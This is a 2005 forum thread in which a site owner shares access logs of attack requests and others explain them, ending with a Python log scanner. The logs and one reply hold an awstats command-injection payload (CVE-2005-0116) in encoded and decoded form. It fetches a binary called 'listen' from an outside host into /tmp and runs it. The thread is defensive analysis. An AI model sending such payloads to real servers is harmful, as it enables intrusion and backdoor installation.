Gossamer Forum

Worm or virus attack?

Recent days, I found that there were many requests to my site

200.24.31.19 - - [10/Nov/2005:00:34:25 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.0" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:26 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.0" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:26 +0000] "POST /xmlrpc.php HTTP/1.0" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:28 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:33 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:33 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.0" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:34 +0000] "POST /drupal/xmlrpc.php HTTP/1.0" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:34 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.0" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:35 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:36 +0000] "POST /wordpress/xmlrpc.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:37 +0000] "POST /xmlrpc.php HTTP/1.0" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:38 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.0" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:39 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.0" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Luckily, we don't use this software at the moment.

Cheers,

Dat

Programming and creating plugins and templates
Blog
Re: [tandat] Worm or virus attack?
Hi,

Looks like either a hacker trying to get into your system, or something "scanning" your server. We get a lot of those on our UNIX machines (normally looking for M$ Windows files, i.e. D:/inetpub/wwwroot and .bat files). Fortunately, we don't use M$ Windows on any publicly available servers, so they won't do bugger all to us :D

TBH, your best bet is to block that IP address, although I'm not sure how much good that'll do, as it appears to be a "general" IP address (i.e. not assigned to a specific machine, such as someone's PC/ADSL etc.);

http://ripe.net/....x=20&submit.y=8

Cheers

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!
Re: [Andy] Worm or virus attack?
Thanks Andy!

That's very scary!

Would blocking the IP cause trouble for innocent users?

Cheers,

Dat

Re: [tandat] Worm or virus attack?
Hi,

Yeah, not the most enjoyable thing in the world :(

Quote:
Would blocking the IP cause trouble for innocent users?

It shouldn't do, as long as you only block the IPs that are trying to request your files. A wildcard should also work, i.e.:

200.24.31.*

We've had a lot of problems with people accessing our sites via proxies (mainly our large forum), so we had to just block all known proxy IPs (which inevitably will block some genuine users, but hey-ho, they should be using a *real* IP address, and not hiding :D).

Cheers

Andy (mod)
andy@ultranerds.co.uk
Re: [Andy] Worm or virus attack?
Thanks for your further explanations. That's very helpful!

Cheers,

Dat

Re: [Andy] Worm or virus attack?
Quote:
so we had to just block all known Proxy IP's

That's not possible. You can block the web-based ones like anonymizer.com but any computer in the world can be used as a proxy.
Re: [Hargreaves] Worm or virus attack?
Quote:
so we had to just block all known Proxy IP's

That's not possible. You can block the web-based ones like anonymizer.com but any computer in the world can be used as a proxy.
Note the word KNOWN. Obviously it's not possible to block *everything*, but you sure as hell can block known proxy IPs (we have a list of over 2500 proxy range IP addresses, which we block), and also people trying to "mask" their IP.

Andy (mod)
andy@ultranerds.co.uk

Last edited by Andy: Nov 10, 2005, 8:43 AM
Re: [tandat] Worm or virus attack?
It's not a worm or a virus. It looks like someone is trying to exploit known vulnerabilities in Perl and PHP scripts.

As long as you don't use those particular scripts you don't need to worry. You can ignore the messages in your log - you only need to block the IPs if you are being persistently hit.
Re: [Andy] Worm or virus attack?
I can't imagine that's doing anything more than slowing down your server.

People using proxies are either connecting to the Internet at work, in which case you are blocking genuine users, or they have some sort of proxy software installed, which generally jumps between proxies at random intervals, so you'll never succeed in blocking them, or thirdly they are using anonymous proxies so you don't even know they are using a proxy.
Re: [tandat] Worm or virus attack?
That IP resolves to chia.udea.edu.co which looks like some sort of educational facility. It may be worth emailing them.
Re: [tandat] Worm or virus attack?
Quote:
200.24.31.19 - - [10/Nov/2005:00:34:25 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|

The thing of interest should be the request, not the IP address making the request. Obviously, by the '?configdir=|', it looks like someone is trying to get awstats to open a pipe that needs shell interpretation. Proper sanitisation (and using the three form version of open) prevents this. This is an attempt to exploit CVE-2005-0116 (a vuln in Awstats 6.1).

|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
Becomes
|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

So, 200.24.31.19 (chia.udea.edu.co - an infected system) tried to get you to download the file listen from 24.224.174.18 (static-224-174-18.eastlink.ca), make it executable, run it with 216.102.212.115 (adsl-216-102-212-115.buytheelection.com) on the command line (presumably, accept only connections from that host).
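One way to pick such requests out of a combined-format access log and percent-decode the injected configdir value so it reads like the line above, as an added example (not the poster's script and not awstats project code); the log lines inside it are constructed with documentation IPs and a shortened payload:

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format, the same shape as the lines posted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that a legitimate awstats configdir value never contains.
SHELL_META = re.compile(r'[|;`$&<>]')

def parse_line(line):
    """Split one combined-log line into fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def decode_query(target):
    """Percent-decode the query by hand; parse_qs is avoided because it may split on raw ';'."""
    params = {}
    for pair in urlsplit(target).query.split('&'):
        key, _, value = pair.partition('=')
        params[unquote(key)] = unquote(value)
    return params

def classify(line):
    """Return a finding for a suspicious request, or None for benign/unparseable lines."""
    rec = parse_line(line)
    if rec is None:
        return None
    path = urlsplit(rec['target']).path.lower()
    params = decode_query(rec['target'])
    if path.endswith('awstats.pl') and SHELL_META.search(params.get('configdir', '')):
        return {'ip': rec['ip'], 'kind': 'awstats-configdir-injection',
                'decoded': params['configdir'], 'served': rec['status'] != '404'}
    if rec['method'] == 'POST' and path.endswith('xmlrpc.php'):
        return {'ip': rec['ip'], 'kind': 'xmlrpc-probe', 'decoded': '',
                'served': rec['status'] != '404'}
    return None

def scan(lines):
    """Run classify over a whole log and keep only the hits."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IPs, shortened payload), not the poster's real log.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2005:00:34:25 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20%2ftmp%3bwget%20192%2e0%2e2%2e10%2flisten%3bchmod%20%2bx%20listen| HTTP/1.0" 404 309 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Nov/2005:00:34:26 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 404 306 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [10/Nov/2005:00:35:00 +0000] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

A finding with `served` set to True (a non-404 status on the awstats path) is the one worth chasing, since it means the script was actually present to receive the request.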